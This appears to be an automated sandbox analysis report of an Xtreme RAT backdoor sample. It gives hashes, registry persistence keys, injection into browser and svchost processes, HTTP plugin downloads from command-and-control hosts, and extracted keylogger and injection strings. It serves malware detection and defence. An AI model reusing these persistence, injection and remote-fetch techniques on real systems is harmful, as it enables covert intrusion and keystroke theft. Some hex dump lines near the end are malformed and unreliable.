Analysis Date: 2013-12-16 04:14:54
MD5: 1dfab158a350c13abd2e014fd658b932
SHA1: e7cdf6221d9737703cadd64c8a162739bbc446ae

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section CODE md5: fc02cd8afdd8793685ea723efa4ed168 sha1: 48a4c9015abc334158995e67deb53a7bb778bff3 size: 34816
Section DATA md5: abbf8c24e134a93f1d3ab1028a249254 sha1: 4de5081984f457329fcc363794543b14efd120be size: 512
Section BSS md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section .idata md5: 97f471540f2f0c36d97a7e7b99200353 sha1: 61ee649f6bbb515b5e16db606e4be05d40a6cf93 size: 4096
Section .tls md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section .rdata md5: 2b44bd00623cc310df7d5458aa2dd5a3 sha1: 0119411a83671023e7bd8836d4b2185170b8ceab size: 512
Section .reloc md5: 9c9fe3de320d8875fa23badb1fcf2898 sha1: 2d0ce500f5b7ad4ffc01d4d734040e6d78eb0e82 size: 2560
Section .rsrc md5: da247aefa2da2e9df4a0e2e570673502 sha1: 492554b15947af748d12ac6a25ded8bd1735781e size: 115200
Timestamp: 1992-06-19 22:22:17 (earlier than Win32 APIs the binary imports, such as IsWow64Process and SetProcessDEPPolicy in the strings below, so this is not a genuine build time)
PEhash: a235f36e4e8f3fc273d548b8735505e0133b47ba
AV clamav: WIN.Trojan.Xtreme
AV avg: BackDoor.Generic15.BMXP
AV mcafee: BackDoor-FAPG!1DFAB158A350
AV avira: BDS/Xtrat.46080125

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe C:\WINDOWS\system32\InstallDir\host.exe
Registry HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\Server ➝
C:\WINDOWS\system32\InstallDir\host.exe
Registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\WINDOWS\system32\InstallDir\host.exe
Registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Server ➝
C:\WINDOWS\system32\InstallDir\host.exe
Registry HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\HKLM ➝
C:\WINDOWS\system32\InstallDir\host.exe
Registry HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{5460C4DF-B266-909E-CB58-E32B79832EB2}\StubPath ➝
C:\WINDOWS\system32\InstallDir\host.exe restart
Registry HKEY_CURRENT_USER\SOFTWARE\((Mutex))\ServerStarted ➝
12/16/2013 1:59:44 AM
Registry HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe C:\WINDOWS\system32\InstallDir\host.exe
Registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\HKCU ➝
C:\WINDOWS\system32\InstallDir\host.exe
Registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Server ➝
C:\WINDOWS\system32\InstallDir\host.exe
Registry HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Server ➝
C:\WINDOWS\system32\InstallDir\host.exe
Registry HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\WINDOWS\system32\InstallDir\host.exe
Creates File C:\WINDOWS\system32\InstallDir\host.exe
Creates File C:\Documents and Settings\Administrator\Local Settings\Temp\x.html
Creates File C:\WINDOWS\system32\InstallDir\
Creates File C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\((Mutex)).cfg
Deletes File C:\Documents and Settings\Administrator\Local Settings\Temp\x.html
Creates Process C:\Program Files\Internet Explorer\iexplore.exe
Creates Process C:\Program Files\Internet Explorer\iexplore.exe
Creates Process svchost.exe
Creates Process C:\Program Files\Internet Explorer\iexplore.exe
Creates Process C:\Program Files\Internet Explorer\iexplore.exe
Creates Process C:\Program Files\Internet Explorer\iexplore.exe
Creates Process explorer.exe
Creates Process C:\Program Files\Internet Explorer\iexplore.exe
Creates Mutex ((Mutex))PERSIST
Creates Mutex ((Mutex))
Creates Mutex XTREMEUPDATE

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

Registry HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates File C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File PIPE\lsarpc
Creates File \Device\Afd\Endpoint
Creates File C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\((Mutex)).dat
Creates File \Device\Afd\AsyncConnectHlp
Creates File C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex ((Mutex))
Creates Mutex WininetConnectionMutex
Creates Mutex c:!documents and settings!administrator!cookies!
Creates Mutex c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS www.webserver.com
Winsock DNS taker.servegame.com

Process
↳ C:\WINDOWS\system32\InstallDir\host.exe

Registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe C:\WINDOWS\system32\InstallDir\host.exe
Registry HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\Server ➝
C:\WINDOWS\system32\InstallDir\host.exe
Registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\WINDOWS\system32\InstallDir\host.exe
Registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Server ➝
C:\WINDOWS\system32\InstallDir\host.exe
Registry HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\HKLM ➝
C:\WINDOWS\system32\InstallDir\host.exe
Registry HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{5460C4DF-B266-909E-CB58-E32B79832EB2}\StubPath ➝
C:\WINDOWS\system32\InstallDir\host.exe restart
Registry HKEY_CURRENT_USER\SOFTWARE\((Mutex))\ServerStarted ➝
12/16/2013 2:00:06 AM
Registry HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe C:\WINDOWS\system32\InstallDir\host.exe
Registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\HKCU ➝
C:\WINDOWS\system32\InstallDir\host.exe
Registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Server ➝
C:\WINDOWS\system32\InstallDir\host.exe
Registry HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Server ➝
C:\WINDOWS\system32\InstallDir\host.exe
Registry HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\WINDOWS\system32\InstallDir\host.exe
Creates File C:\Documents and Settings\Administrator\Local Settings\Temp\x.html
Creates File C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\((Mutex)).cfg
Deletes File C:\Documents and Settings\Administrator\Local Settings\Temp\x.html
Deletes File C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\((Mutex)).cfg
Creates Process C:\Program Files\Internet Explorer\iexplore.exe
Creates Mutex ((Mutex))PERSIST
Creates Mutex ((Mutex))
Creates Mutex XTREMEUPDATE

Process
↳ svchost.exe

Registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe C:\WINDOWS\system32\InstallDir\host.exe
Registry HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\Server ➝
C:\WINDOWS\system32\InstallDir\host.exe
Registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\WINDOWS\system32\InstallDir\host.exe
Registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Server ➝
C:\WINDOWS\system32\InstallDir\host.exe
Registry HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\HKLM ➝
C:\WINDOWS\system32\InstallDir\host.exe
Registry HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{5460C4DF-B266-909E-CB58-E32B79832EB2}\StubPath ➝
C:\WINDOWS\system32\InstallDir\host.exe restart
Registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\HKCU ➝
C:\WINDOWS\system32\InstallDir\host.exe
Registry HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe C:\WINDOWS\system32\InstallDir\host.exe
Registry HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Server ➝
C:\WINDOWS\system32\InstallDir\host.exe
Registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Server ➝
C:\WINDOWS\system32\InstallDir\host.exe
Registry HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\WINDOWS\system32\InstallDir\host.exe
Creates Process C:\WINDOWS\system32\InstallDir\host.exe
Creates Mutex ((Mutex))PERSIST
Creates Mutex ((Mutex))
Creates Mutex ((Mutex))EXIT

Process
↳ explorer.exe

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

Network Details:

DNS www.webserver.com
Type: A
82.98.86.174
DNS taker.servegame.com
Type: A
179.232.141.60
HTTP GET http://www.webserver.com/plugin.xtr
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET http://taker.servegame.com:1338/1234567890.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET http://www.webserver.com/plugin.xtr
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET http://taker.servegame.com:1338/1234567890.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET http://www.webserver.com/plugin.xtr
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET http://taker.servegame.com:1338/1234567890.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP 192.168.1.1:1032 ➝ 82.98.86.174:80
Flows TCP 192.168.1.1:1033 ➝ 179.232.141.60:1338
Flows TCP 192.168.1.1:1034 ➝ 82.98.86.174:80
Flows TCP 192.168.1.1:1035 ➝ 179.232.141.60:1338
Flows TCP 192.168.1.1:1036 ➝ 82.98.86.174:80
Flows TCP 192.168.1.1:1037 ➝ 179.232.141.60:1338

Raw Pcap
0x00000000 (00000)   47455420 2f706c75 67696e2e 78747220   GET /plugin.xtr 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a207777 772e7765 62736572   Host: www.webser
0x000000b0 (00176)   7665722e 636f6d0d 0a436f6e 6e656374   ver.com..Connect
0x000000c0 (00192)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000d0 (00208)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f313233 34353637 3839302e   GET /1234567890.
0x00000010 (00016)   66756e63 74696f6e 73204854 54502f31   functions HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   74616b65 722e7365 72766567 616d652e   taker.servegame.
0x000000c0 (00192)   636f6d3a 31333338 0d0a436f 6e6e6563   com:1338..Connec
0x000000d0 (00208)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000e0 (00224)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f706c75 67696e2e 78747220   GET /plugin.xtr 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a207777 772e7765 62736572   Host: www.webser
0x000000b0 (00176)   7665722e 636f6d0d 0a436f6e 6e656374   ver.com..Connect
0x000000c0 (00192)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000d0 (00208)   0a0d0a6e 3a204b65 65702d41 6c697665   ...n: Keep-Alive
0x000000e0 (00224)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f313233 34353637 3839302e   GET /1234567890.
0x00000010 (00016)   66756e63 74696f6e 73204854 54502f31   functions HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   74616b65 722e7365 72766567 616d652e   taker.servegame.
0x000000c0 (00192)   636f6d3a 31333338 0d0a436f 6e6e6563   com:1338..Connec
0x000000d0 (00208)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000e0 (00224)   0d0a0d0a 203c703e 596f7572 2062726f   .... <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f706c75 67696e2e 78747220   GET /plugin.xtr 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a207777 772e7765 62736572   Host: www.webser
0x000000b0 (00176)   7665722e 636f6d0d 0a436f6e 6e656374   ver.com..Connect
0x000000c0 (00192)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000d0 (00208)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f313233 34353637 3839302e   GET /1234567890.
0x00000010 (00016)   66756e63 74696f6e 73204854 54502f31   functions HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   74616b65 722e7365 72766567 616d652e   taker.servegame.
0x000000c0 (00192)   636f6d3a 31333338 0d0a436f 6e6e6563   com:1338..Connec
0x000000d0 (00208)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000e0 (00224)   0d0a0d0a 32392030 64306134 38366620   ....29 0d0a486f 
0x000000f0 (00240)   37333734 33613230 20202030 2e353037   73743a20   0.507
0x00000100 (00256)   3237292e 2e486f73 743a200a            27)..Host: .


Strings
 --- 
[Accept]
[Arrow Down]
[Arrow Left]
[Arrow Right]
[Arrow Up]
[Backspace]
[Back Tab]
BINDER
[Caps Lock]
.cfg
[CLIPBOARD] ---- 
[CLIPBOARD END]
CONFIG
[Context Menu]
[Copy]
.dat
%DEFAULTBROWSER%
[Delete]
DVCLAL
[End]
ENDSERVERBUFFER
[Esc]
.exe
[Execute]
explorer.exe
explorer.exe 
[F1]
[F10]
[F11]
[F12]
[F13]
[F14]
[F15]
[F16]
[F17]
[F18]
[F19]
[F2]
[F20]
[F21]
[F22]
[F23]
[F24]
[F3]
[F4]
[F5]
[F6]
[F7]
[F8]
[F9]
FakeMessage
[Finish]
frgjbfdkbnfsdjbvofsjfrfre
frgkmjgtmklgtlrglt
.functions
[Help]
hgtrfsgfrsgfgregtregtr
[Home]
http://
ICON_STANDARD
[Insert]
InstalledServer
jiejwogfdjieovevodnvfnievn
jytjyegrsfvfbgfsdf
KeyDelBackspace
LastSize
[Left Alt]
[Left Ctrl]
Load
local
[Mail]
MAINICON
[Media]
\Microsoft\Windows\
[Mode Change]
Mutex
[Next Track]
%NOINJECT%
[Num Lock]
Numpad
[Numpad -]
[Numpad /]
[Numpad .]
[Numpad *]
[Numpad +]
open
PACKAGEINFO
[Page Down]
[Page Up]
[Pause]
[Play]
[Play / Pause]
[Previous Track]
[Print]
[Print Screen]
[Process]
[Reset]
restart
 restart
[Right Alt]
[Right Ctrl]
[Scrol Lock]
[Select]
[Separator]
ServerStarted
Shell
[Sleep]
SOFTWARE\
SOFTWARE\FakeMessage
Software\Microsoft\Active Setup\Installed Components\
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\RunOnce
Software\Microsoft\Windows NT\CurrentVersion\Windows
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
SOFTWARE\XtremeRAT
[Stop]
StubPath
svchost.exe
[Tab]
trhgtehgfsgrfgtrwegtre
[Volume Down]
[Volume Mute]
[Volume Up]
x.html
.xtr
XTREME
XTREMEBINDER
XtremeKeylogger
Xtreme RAT
XTREMEUPDATE
[Zoom]
>>>>>>>>>
;)/////
:(/+.///////
""++/+
(((++........++
)//./////
)+/.//////
$((+++++..+++
$(+../////////
$$$((((((
+/>>>>>>
$0(0,0004080<0D0H0L0l0p0t0
0"0*020:0B0J0R0Z0b0j0r0z0
020>0U0b0n0
:$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
%06789:;<&'()*+,-./12345
)+//////0[bm
0~'**)|vkoc
)//./////0Z
$$$((++++++1
1+1;1Q1b1g1l1v1
1$181H1N1]1c1{1
1?1X1q1
1fs\wm
1:Z+To/
2/>>>>>>
2$2-292q2}2
2*3/34393E3J3]3j3|3
2(++..////6//6
+29>>>>>
29>>>>
29>>>4cy
29>>>>:g
="=@=[=2><>F>P>Z>
2Functions
<2<?<H<S<
(+.////////3
3)3.343>3J3q3
3"3,3C3O3V3h3z3
;3<D<e<&=R=
3J3f3r3
=3l#<O
4)+.////////
424:4B4J4R4Z4b4j4r4z4
4"4&4*4.42464:4>4B4F4J4N4R4V4Z4^4b4f4j4n4r4v4z4~4
4'4-4;4w4
4$4,474<4F4L4s4{4
4$4Y4`4
4=5w5}5
<(<4<B<j<w<}<
:#:4:E:V:g:u:
'?4=kW!{
 4K(X|
++55;;>;>/
++55;;/?
5'535A5n5v5~5
5"5*525:5B5J5R5Z5b5j5r5z5
5"5&5*5.52595J5[5l5}5
5+5J5V5\5h5p5}5
5#6/666H6_6k6s6}6
5%6G6F7N7V7
++5;;>>>>>9/
(//.//6///.`
(+/.///6////
(+++...6///////..+)
$((++.......6/..+ 
$)+..///////6
++++.6///////////..)(
#$(+++....6/6////.+)
6"6*626:6B6J6R6Z6b6j6r6z6
6'686I6Z6k6|6
686B6i6n6s6
=.>6>>>W>
<!<*<7<
7//.6///]bbd
7&777H7Y7j7{7
7-7>7k7q7|7
7)7h7~7
7>>eknpp
7i	HF,F}
%(+++.//////////8=
8%868G8X8i8z8
8 8&808<8D8S8X8b8q8}8
8 8*848>8I8N8
8?8K8T8
8:9@9q9|9
8//..\deiiiiir
>8d,?(M4
8g	$`jv
!"/;;>>>>>>>9/ 
9#:1:<:S:_:f:q:
9$959F9W9h9y9
9"9?9E9R9e9r9x9
9/9;9i9
+9>>>>>B
9fnppttttt
*^>9X%
advapi32.dll
:a>k>	?
=<=A=K=U=_=q=
b7HOPPN;6U
C+9>>>>>
CallNextHookEx
:cA_z(
CharLowerW
CharNextW
CharUpperW
CloseClipboard
CloseHandle
=C=O=\=n=
CopyFileW
CreateDirectoryW
CreateFileW
CreateMutexW
CreateProcessW
CreateRemoteThread
CreateThread
CreateToolhelp32Snapshot
CreateWindowExW
D"99;>>>>>>HJJE+
d{{{AQe#
dddiiir
,////.^ddhii
ddiiiipppp
DefWindowProcA
DeleteFileW
DeleteUrlCacheEntryW
dhqqqqsssssususuuuususssqqqqqppiie~
DispatchMessageA
,_dppppqqqqssssssssssssrqqqjjjhhphph
ExitProcess
???FFFIGFFF???>
?FFHHHHHKHHHHHF?
:fh{k 
FindExecutableW
FindFirstFileW
FindResourceW
FreeLibrary
FreeResource
FtpPutFileW
FtpSetCurrentDirectoryW
g8+I`6
G9;>&djn
geippppqpqqqqu
GetClipboardData
GetCommandLineW
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDateFormatW
GetDesktopWindow
GetFileAttributesW
GetFileSize
GetForegroundWindow
GetKeyboardLayout
GetKeyboardState
GetKeyState
GetLastError
GetLocalTime
GetModuleFileNameExW
GetModuleFileNameW
GetModuleHandleA
GetProcAddress
GetProcessHeap
GetSystemDirectoryW
GetSystemTime
GetTempPathW
GetThreadContext
GetTimeFormatW
GetWindowRect
GetWindowsDirectoryW
GetWindowTextW
GetWindowThreadProcessId
GlobalLock
GlobalSize
GlobalUnlock
>;>G>S>[>c>p>x>
;#;-;g;t;
HeapAlloc
HeapFree
HeapReAlloc
Hf;4Cu
hqssuuuu{v{{{
;H;U;z;
HUZ+tP3Y/3Z
?>????????>>>I
.idata
IHDR_x
ILLMMMNNOMMMLH
InternetCloseHandle
InternetConnectW
InternetOpenW
>.>=>I>N>Z>f>r>x>
IsWow64Process
j38O~m
JC84*$
JhQ@iWa
K 2!RN
kernel32.dll
Kernel32.dll
KKLLKK
KMMNRRRRRROMML
kpqqsssuuuvvvvvvvvvvvuussssqqqpphq
kptttvvvvvvvvvvtttpppnq
ksuuv{{{{
KWindows
:(:@:?=K=X=j=r=z=
-K/Zrz
l6k1<x
LFHHLLMMMLLLHHHM
LLQQQQQQLL
LoadLibraryA
LoadResource
LocalAlloc
LocalFileTimeToFileTime
LockResource
lstrlenW
L,zJ`oiCy{0N@
MapVirtualKeyW
MessageBoxW
mnpppp
MultiByteToWideChar
n1BX80
N6ofVF.X
NJ$>CUP#
NORRSSSSRRRO
}nRjA.H
ntdll.dll
NtSetInformationProcess
NtUnmapViewOfSection
ntvvwvxx
nuv{{{
oleaut32.dll
OpenClipboard
OpenProcess
O	veBP'
_oz	sX
PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
PeekMessageA
{$P(& M
Portions Copyright (c) 1999,2003 Avenger by NhT
PostMessageA
P.reloc
Process32FirstW
Process32NextW
P.rsrc
PSAPI.dll
pSS	xS
:$:p:v:
=,>^>*?q?
q6q4_!e
>@?=QN59984
QQQQQQQSVW
QQQQQQS
QSSSVVSUSQ
R1Y1f1
RaiseException
.rdata
ReadFile
ReadProcessMemory
RegCloseKey
RegCreateKeyExW
RegCreateKeyW
RegisterClassW
RegisterWindowMessageW
RegOpenKeyExW
RegQueryValueExW
RegSetValueExW
ResumeThread
	{:r=J
RtlUnwind
/s#10y'
SendMessageA
SetClipboardViewer
SetEndOfFile
SetErrorMode
SetFileAttributesW
SetFilePointer
SetFileTime
SetProcessDEPPolicy
SetThreadContext
SetThreadPriority
SetWindowsHookExW
SHDeleteKeyW
shell32.dll
Shell32.dll
ShellExecuteW
SHGetMalloc
SHGetPathFromIDListW
SHGetSpecialFolderLocation
shlwapi.dll
ShowWindow
SizeofResource
(S#u'v
SUWWWXWVVS
SWWYYWWT
SysAllocStringLen
SysFreeString
SysInit
SysReAllocStringLen
System
SystemTimeToFileTime
Sz6`ev
;.;`;t;
TerminateProcess
TerminateThread
This program must be run under Win32
TKMLJS
TlsGetValue
TlsSetValue
ToUnicodeEx
TranslateMessage
UnhandledExceptionFilter
UnhookWindowsHookEx
UnitConfigs
UnitCryptString
UnitGetServer
UnitInjectProcess
UnitInjectServer
UnitInstallServer
UnitKeylogger
URLDownloadToFileW
urlmon.dll
user32.dll
UTypes
V3CFIICFBA2R
VirtualAlloc
VirtualAllocEx
VirtualFree
VirtualFreeEx
VirtualProtectEx
{{{vsw
{{{vuuqk
{{{vuuussqh
{{{{vvvvvuusssqqih
WaitForSingleObject
WideCharToMultiByte
WideString
wininet.dll
&%Wkkg_
=)wpa.s
WriteFile
WriteProcessMemory
WVXEGHF@A
;W]XV.
`WXYYYYXWa
XRSSVVWWTSRY
xwvvts
